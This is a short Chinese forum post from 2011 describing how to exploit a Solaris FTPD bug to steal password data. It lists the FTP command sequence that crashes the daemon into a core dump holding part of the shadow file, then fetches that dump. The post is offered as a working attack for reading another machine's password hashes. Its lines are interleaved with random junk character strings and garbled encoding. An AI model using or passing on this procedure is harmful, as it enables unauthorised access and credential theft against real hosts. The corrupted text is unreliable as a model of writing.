該方法利用了Solaris 操作系統(tǒng)中FTPD的一個(gè)BUG,使得用戶可以獲得該機(jī)的口令文件��。具體過程如下:1 y5 a1 x; ^- m" ^8 R7 ^
+ f6 p9 c1 v$ d- l; E2 w) T& \, }
1.通過 ftp 正常登錄到目的主機(jī)上
! d$ T+ m: a# n, ?+ Z! J- t2 k/ z* q7 O J* ~
2.輸入如下命令序列:
1 o, u) [/ P3 d6 p" } a
) D Z7 v/ J8 W0 ^$ x# T6 O Kftp> user root wrongpasswd
6 K! T6 h( u, @8 d! \: m3 r. o+ j8 z+ K0 { d
ftp> quote pasv
1 |1 [- a0 W4 ~; e( Y
9 i: n. J! Z$ i. ^3.這時(shí)�,ftpd會(huì)報(bào)錯(cuò)退出,同時(shí)會(huì)在當(dāng)前目錄下生成一個(gè)core�,口令文件就包含在這個(gè)core中。 {6 n# X+ H7 v9 u3 i
* L" f) J( C' k2 Y& m$ A
4.再次進(jìn)入FTP >get core
. W* g/ z* O1 `; Q' _- V, I7 [4 ]( G$ n( h ~( [5 x# A7 ?+ p
補(bǔ)充:雖然在core只有一部分shadow��,但是對(duì)于系統(tǒng)來說已經(jīng)是致命的打擊了# P5 F0 r+ w n7 K( b4 I
: ~, M8 {. o' X6 |1 U; o
|
發(fā)表于 2011-1-12 21:01:38
QQ好友和群
QQ空間
提升卡
置頂卡
沉默卡
喧囂卡
變色卡
顯身卡